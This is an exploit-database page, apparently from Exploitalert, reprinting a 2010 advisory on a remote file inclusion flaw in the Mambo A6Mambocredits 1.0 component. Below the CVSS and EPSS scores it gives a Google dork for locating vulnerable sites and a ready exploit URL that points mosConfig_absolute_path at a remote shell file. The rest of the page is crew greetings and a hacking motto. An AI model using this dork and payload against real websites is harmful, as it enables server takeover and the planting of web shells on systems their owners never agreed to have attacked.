Advertisement






The Mambo A6Mambocredits component 1.0 remote file inclusion vulnerability

CVE Category Price Severity
CWE-20 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2010-11-16
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.00908 0.23236

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010110027

Below is a copy:

=========================================================
Mambo Component com_a6mambocredits RFI Vulnerability
=========================================================

[+]Title : Mambo Component com_a6mambocredits RFI Vulnerability
[+]Software  : A6Mambocredits 1.0 
[+]Vendor  : http://secunia.com/
[+]Download : http://downloadnew.org/scripts/modules/a6mambocredits-download-129881.html
[+]Author : jos_ali_joe
[+]Contact : josalijoe[at]yahoo[dot]com
[+]Home  : http://josalijoe.wordpress.com/


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ##########################################        1
0                    I'm jos_ali_joe  member from Inj3ct0r Team        1
1                    ##########################################        0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###########

Dork : inurl:index.php?option="com_a6mambocredits"

###########

------------------------------------------------------------------------

RFI Exploit

Exploit :

http://example.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=[ Shell txt ]

--------------------------------------------------------------------------


Greets For :

./Devilzc0de crew � Kebumen Cyber � Explore Crew � Indonesian Hacker - Tecon Crew - Security Hub

./Byroe Net - Yogya Carderlink - anten4

My Team : ./Indonesian Coder & inj3ct0r

Special Thanks :

/. google.com


[+] Note : 

Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. 
Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, 
Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum